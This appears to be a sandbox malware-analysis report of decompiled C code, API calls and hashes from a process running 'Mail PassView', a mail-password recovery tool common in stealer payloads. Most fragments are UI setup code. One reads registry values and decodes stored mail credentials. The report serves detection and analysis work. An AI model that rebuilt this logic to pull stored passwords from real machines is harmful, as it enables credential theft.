                                                              				RegisterClassA( &_v44);
                                                              				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
                                                              				 *(__esi + 0x108) = _t20;
                                                              				return _t20;
                                                              			}






                                                              0x0040b710
                                                              0x0040b715
                                                              0x0040b71e
                                                              0x0040b727
                                                              0x0040b72e
                                                              0x0040b731
                                                              0x0040b738
                                                              0x0040b73b
                                                              0x0040b73e
                                                              0x0040b741
                                                              0x0040b748
                                                              0x0040b74b
                                                              0x0040b776
                                                              0x0040b77c
                                                              0x0040b784

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassCreateRegisterWindow
                                                              • String ID: Mail PassView$MailPassView
                                                              • API String ID: 3469048531-1277648965
                                                              • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                              • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                              • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                              • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00401085(void* __esi, void* __eflags) {
                                                              				struct tagLOGFONTA _v64;
                                                              				int _t10;
                                                              				long _t11;
                                                              
                                                              				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
                                                              				_t10 = CreateFontIndirectA( &_v64);
                                                              				 *(__esi + 0x20c) = _t10;
                                                              				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                              				if( *0x417388 != 0) {
                                                              					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                              				}
                                                              				return _t11;
                                                              			}






                                                              0x00401098
                                                              0x004010a4
                                                              0x004010bd
                                                              0x004010c3
                                                              0x004010cc
                                                              0x00000000
                                                              0x004010e0
                                                              0x004010e4

                                                              APIs
                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                              • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 4251605573-168460110
                                                              • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                              • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                              • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                              • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                              				int _t6;
                                                              				void** _t10;
                                                              
                                                              				_t10 = __eax;
                                                              				if( *0x417510 == 0) {
                                                              					memcpy(0x416e70,  *__eax, 0x50);
                                                              					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                              					 *0x417510 = 1;
                                                              					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                              					 *0x417510 =  *0x417510 & 0x00000000;
                                                              					 *0x416b9c = _t6;
                                                              					return 1;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}





                                                              0x0040de4b
                                                              0x0040de4d
                                                              0x0040de5d
                                                              0x0040de6f
                                                              0x0040de8d
                                                              0x0040de93
                                                              0x0040de99
                                                              0x0040dea0
                                                              0x0040dea8
                                                              0x0040de4f
                                                              0x0040de53
                                                              0x0040de53

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$DialogParam
                                                              • String ID: V7
                                                              • API String ID: 392721444-2959985473
                                                              • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                              • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                              • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                              • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E004062D1(struct HWND__* _a4) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				signed int _t10;
                                                              
                                                              				_v260 = 0;
                                                              				memset( &_v259, 0, 0xff);
                                                              				GetClassNameA(_a4,  &_v260, 0xff);
                                                              				_t10 =  &_v260;
                                                              				_push("edit");
                                                              				_push(_t10);
                                                              				L004115B2();
                                                              				asm("sbb eax, eax");
                                                              				return  ~_t10 + 1;
                                                              			}






                                                              0x004062ea
                                                              0x004062f1
                                                              0x00406304
                                                              0x0040630a
                                                              0x00406310
                                                              0x00406315
                                                              0x00406316
                                                              0x0040631f
                                                              0x00406324

                                                              APIs
                                                              • memset.MSVCRT ref: 004062F1
                                                              • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                              • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassName_stricmpmemset
                                                              • String ID: edit
                                                              • API String ID: 3665161774-2167791130
                                                              • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                              • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                              • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                              • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040EDAC() {
                                                              				struct HINSTANCE__* _t1;
                                                              				_Unknown_base(*)()* _t2;
                                                              
                                                              				if( *0x417520 == 0) {
                                                              					_t1 = LoadLibraryA("shell32.dll");
                                                              					 *0x417520 = _t1;
                                                              					if(_t1 != 0) {
                                                              						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                              						 *0x41751c = _t2;
                                                              						return _t2;
                                                              					}
                                                              				}
                                                              				return _t1;
                                                              			}





                                                              0x0040edb3
                                                              0x0040edba
                                                              0x0040edc2
                                                              0x0040edc7
                                                              0x0040edcf
                                                              0x0040edd5
                                                              0x00000000
                                                              0x0040edd5
                                                              0x0040edc7
                                                              0x0040edda

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                              • API String ID: 2574300362-543337301
                                                              • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                              • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                              • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                              • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 87%
                                                              			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                              				void* _t27;
                                                              				intOrPtr _t28;
                                                              				intOrPtr* _t29;
                                                              				intOrPtr* _t44;
                                                              
                                                              				_t44 = __esi;
                                                              				 *__esi = 0x414288;
                                                              				_t27 = E00406549(0x46c, __esi);
                                                              				_push(0x20);
                                                              				L004115D0();
                                                              				if(_t27 == 0) {
                                                              					_t28 = 0;
                                                              				} else {
                                                              					_t28 = E00406A2C(_t27);
                                                              				}
                                                              				_push(0x20);
                                                              				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                              				L004115D0();
                                                              				if(_t28 == 0) {
                                                              					_t29 = 0;
                                                              				} else {
                                                              					_t29 = E00406A2C(_t28);
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                              				L004115D0();
                                                              				if(_t29 == 0) {
                                                              					_t29 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                              					 *_t29 = 0;
                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                              				L004115D0();
                                                              				if(_t29 == 0) {
                                                              					_t29 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                              					 *_t29 = 0;
                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                              				L004115D0();
                                                              				if(_t29 == 0) {
                                                              					_t29 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                              					 *_t29 = 0;
                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                              				}
                                                              				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                              				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                              				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                              				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                              				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                              				return _t44;
                                                              			}







                                                              0x0040fe05
                                                              0x0040fe0d
                                                              0x0040fe13
                                                              0x0040fe18
                                                              0x0040fe1a
                                                              0x0040fe25
                                                              0x0040fe2e
                                                              0x0040fe27
                                                              0x0040fe27
                                                              0x0040fe27
                                                              0x0040fe30
                                                              0x0040fe32
                                                              0x0040fe38
                                                              0x0040fe40
                                                              0x0040fe49
                                                              0x0040fe42
                                                              0x0040fe42
                                                              0x0040fe42
                                                              0x0040fe4b
                                                              0x0040fe4d
                                                              0x0040fe53
                                                              0x0040fe60
                                                              0x0040fe72
                                                              0x0040fe62
                                                              0x0040fe62
                                                              0x0040fe65
                                                              0x0040fe67
                                                              0x0040fe6a
                                                              0x0040fe6d
                                                              0x0040fe6d
                                                              0x0040fe74
                                                              0x0040fe76
                                                              0x0040fe7c
                                                              0x0040fe84
                                                              0x0040fe96
                                                              0x0040fe86
                                                              0x0040fe86
                                                              0x0040fe89
                                                              0x0040fe8b
                                                              0x0040fe8e
                                                              0x0040fe91
                                                              0x0040fe91
                                                              0x0040fe98
                                                              0x0040fe9a
                                                              0x0040fea0
                                                              0x0040fea8
                                                              0x0040feba
                                                              0x0040feaa
                                                              0x0040feaa
                                                              0x0040fead
                                                              0x0040feaf
                                                              0x0040feb2
                                                              0x0040feb5
                                                              0x0040feb5
                                                              0x0040fec2
                                                              0x0040fecd
                                                              0x0040fed6
                                                              0x0040fedd
                                                              0x0040fee0
                                                              0x0040fee3
                                                              0x0040fee6
                                                              0x0040feec

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                              • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                              • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                              • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                              				signed int _t13;
                                                              				signed int _t25;
                                                              				int _t26;
                                                              				char* _t30;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t35;
                                                              
                                                              				_t35 = __esi;
                                                              				_t25 = 0x3f;
                                                              				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                              				_t30 = __esi + 0x18 + _t13;
                                                              				 *_t30 = 0x80;
                                                              				_t26 = _t25 - _t13;
                                                              				_t31 = _t30 + 1;
                                                              				if(_t26 >= 8) {
                                                              					memset(_t31, 0, _t26 + 0xfffffff8);
                                                              				} else {
                                                              					memset(_t31, 0, _t26);
                                                              					_t33 = __esi + 0x18;
                                                              					E0040BD8A(_t33, __esi);
                                                              					memset(_t33, 0, 0x38);
                                                              				}
                                                              				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                              				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                              				E0040BD8A(_t35 + 0x18, _t35);
                                                              				memcpy(_a4, _t35, 0x10);
                                                              				return memset(_t35, 0, 4);
                                                              			}










                                                              0x0040bd0b
                                                              0x0040bd13
                                                              0x0040bd14
                                                              0x0040bd16
                                                              0x0040bd1a
                                                              0x0040bd1d
                                                              0x0040bd1f
                                                              0x0040bd23
                                                              0x0040bd52
                                                              0x0040bd25
                                                              0x0040bd2a
                                                              0x0040bd2f
                                                              0x0040bd36
                                                              0x0040bd40
                                                              0x0040bd48
                                                              0x0040bd5d
                                                              0x0040bd63
                                                              0x0040bd6b
                                                              0x0040bd77
                                                              0x0040bd89

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                              • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                              • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                              • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                              				void _v2058;
                                                              				char _v2060;
                                                              				char _v2069;
                                                              				char _v2070;
                                                              				char _v2071;
                                                              				char _v2072;
                                                              				char _v3086;
                                                              				signed char _v3090;
                                                              				char _v3091;
                                                              				char _v3092;
                                                              				char* _v3096;
                                                              				char _v3100;
                                                              				short* _v3104;
                                                              				int _v3108;
                                                              				char _v3112;
                                                              				void* __ebx;
                                                              				void* _t49;
                                                              				signed int _t61;
                                                              				short* _t76;
                                                              				void* _t83;
                                                              				signed int _t87;
                                                              				void* _t90;
                                                              
                                                              				_t83 = __eax;
                                                              				_t73 = 0;
                                                              				 *_a12 = 0;
                                                              				_v3112 = 0x400;
                                                              				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                              				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                              				if(_t49 == 0) {
                                                              					_v2069 = 0;
                                                              					_v2070 = 0;
                                                              					_v2071 = 0;
                                                              					_v2072 = 0;
                                                              					if(_v3092 != 1) {
                                                              						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                              							_v3100 = _v3112 - 1;
                                                              							_v3096 =  &_v3091;
                                                              							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                              								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                              								LocalFree(_v3104);
                                                              							}
                                                              						}
                                                              					} else {
                                                              						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                              							if(_a16 == 0) {
                                                              								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                              							} else {
                                                              								_v2060 = 0;
                                                              								memset( &_v2058, 0, 0x800);
                                                              								_t90 = _t90 + 0xc;
                                                              								_t76 =  &_v2060;
                                                              								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                              								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                              							}
                                                              							_t73 = 0;
                                                              						}
                                                              						_t79 = _a12;
                                                              						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                              							_t61 = _v3090 & 0x000000ff;
                                                              							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                              								E00401DFD(_t79,  &_v3086, _t61);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return 0 |  *_a12 != _t73;
                                                              			}

























                                                              0x0040247a
                                                              0x0040247f
                                                              0x00402481
                                                              0x00402490
                                                              0x0040249b
                                                              0x004024a0
                                                              0x004024a5
                                                              0x004024b0
                                                              0x004024b7
                                                              0x004024be
                                                              0x004024c5
                                                              0x004024cc
                                                              0x0040259e
                                                              0x004025ad
                                                              0x004025b5
                                                              0x004025d1
                                                              0x004025e4
                                                              0x004025ee
                                                              0x004025ee
                                                              0x004025d1
                                                              0x004024d2
                                                              0x004024d8
                                                              0x004024dd
                                                              0x00402546
                                                              0x004024df
                                                              0x004024ed
                                                              0x004024f5
                                                              0x004024fa
                                                              0x00402510
                                                              0x00402517
                                                              0x0040252c
                                                              0x0040252c
                                                              0x0040254b
                                                              0x0040254b
                                                              0x0040254d
                                                              0x00402552
                                                              0x00402575
                                                              0x0040257d
                                                              0x0040258f
                                                              0x00402594
                                                              0x0040257d
                                                              0x00402552
                                                              0x004024cc
                                                              0x00402603

                                                              APIs
                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                              • LocalFree.KERNEL32(?), ref: 004025EE
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 3503910906-0
                                                              • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                              • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                              • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                              • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                              				intOrPtr _v8;
                                                              				void _v263;
                                                              				char _v264;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t42;
                                                              				signed int _t45;
                                                              				intOrPtr* _t60;
                                                              				signed char _t62;
                                                              				intOrPtr _t63;
                                                              				int _t65;
                                                              
                                                              				_t61 = __ecx;
                                                              				_t60 = _a8;
                                                              				_t63 = __ecx;
                                                              				_v8 = __ecx;
                                                              				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                              					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                              					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                              					 *(_t63 + 0x110) = _t42;
                                                              				}
                                                              				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                              					_v264 = 0;
                                                              					memset( &_v263, 0, 0xff);
                                                              					E00401000(_t61,  &_v264, 0x412440);
                                                              					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                              					_t63 = _v8;
                                                              				}
                                                              				_t65 = 0;
                                                              				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                              					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                              					if( *_t60 == _t42) {
                                                              						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                              						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                              					}
                                                              				}
                                                              				if(_a4 != 0x103) {
                                                              					L27:
                                                              					return _t42;
                                                              				} else {
                                                              					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                              					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                              						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
                                                              						_t65 = 0;
                                                              					}
                                                              					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                              						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                              						_t65 = 0;
                                                              					}
                                                              					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                              						goto L27;
                                                              					} else {
                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                              							_t62 = 2;
                                                              							_t45 =  *(_t60 + 0x14) & _t62;
                                                              							__eflags = _t45;
                                                              							if(_t45 == 0) {
                                                              								L20:
                                                              								__eflags = _t45 - _t62;
                                                              								if(_t45 == _t62) {
                                                              									L23:
                                                              									_t42 = 0;
                                                              									__eflags = 0;
                                                              									L24:
                                                              									if(_t42 == _t65) {
                                                              										goto L27;
                                                              									}
                                                              									_t42 = _t63 + 0x25c;
                                                              									if( *_t42 != _t65) {
                                                              										goto L27;
                                                              									}
                                                              									 *_t42 = 1;
                                                              									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                              								}
                                                              								__eflags =  *(_t60 + 0x18) & _t62;
                                                              								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                              									goto L23;
                                                              								}
                                                              								L22:
                                                              								_t42 = 1;
                                                              								goto L24;
                                                              							}
                                                              							__eflags =  *(_t60 + 0x18) & _t62;
                                                              							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                              								goto L22;
                                                              							}
                                                              							goto L20;
                                                              						}
                                                              						asm("sbb eax, eax");
                                                              						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                              						goto L24;
                                                              					}
                                                              				}
                                                              			}














                                                              0x0040b3c4
                                                              0x0040b3ce
                                                              0x0040b3da
                                                              0x0040b3dc
                                                              0x0040b3df
                                                              0x0040b3ef
                                                              0x0040b3f4
                                                              0x0040b3fe
                                                              0x0040b3fe
                                                              0x0040b40b
                                                              0x0040b427
                                                              0x0040b42e
                                                              0x0040b43e
                                                              0x0040b44f
                                                              0x0040b454
                                                              0x0040b457
                                                              0x0040b45a
                                                              0x0040b463
                                                              0x0040b472
                                                              0x0040b47a
                                                              0x0040b48c
                                                              0x0040b492
                                                              0x0040b492
                                                              0x0040b47a
                                                              0x0040b49c
                                                              0x0040b539
                                                              0x0040b539
                                                              0x0040b4a2
                                                              0x0040b4a2
                                                              0x0040b4a6
                                                              0x0040b4aa
                                                              0x0040b4af
                                                              0x0040b4af
                                                              0x0040b4b5
                                                              0x0040b4c1
                                                              0x0040b4c6
                                                              0x0040b4c6
                                                              0x0040b4cc
                                                              0x00000000
                                                              0x0040b4ce
                                                              0x0040b4da
                                                              0x0040b4f4
                                                              0x0040b4f5
                                                              0x0040b4f5
                                                              0x0040b4f7
                                                              0x0040b4fe
                                                              0x0040b4fe
                                                              0x0040b500
                                                              0x0040b50c
                                                              0x0040b50c
                                                              0x0040b50c
                                                              0x0040b50e
                                                              0x0040b510
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b512
                                                              0x0040b51a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b529
                                                              0x00000000
                                                              0x0040b52f
                                                              0x0040b502
                                                              0x0040b505
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b507
                                                              0x0040b509
                                                              0x00000000
                                                              0x0040b509
                                                              0x0040b4f9
                                                              0x0040b4fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b4fc
                                                              0x0040b4e9
                                                              0x0040b4eb
                                                              0x00000000
                                                              0x0040b4eb
                                                              0x0040b4cc

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B42E
                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B472
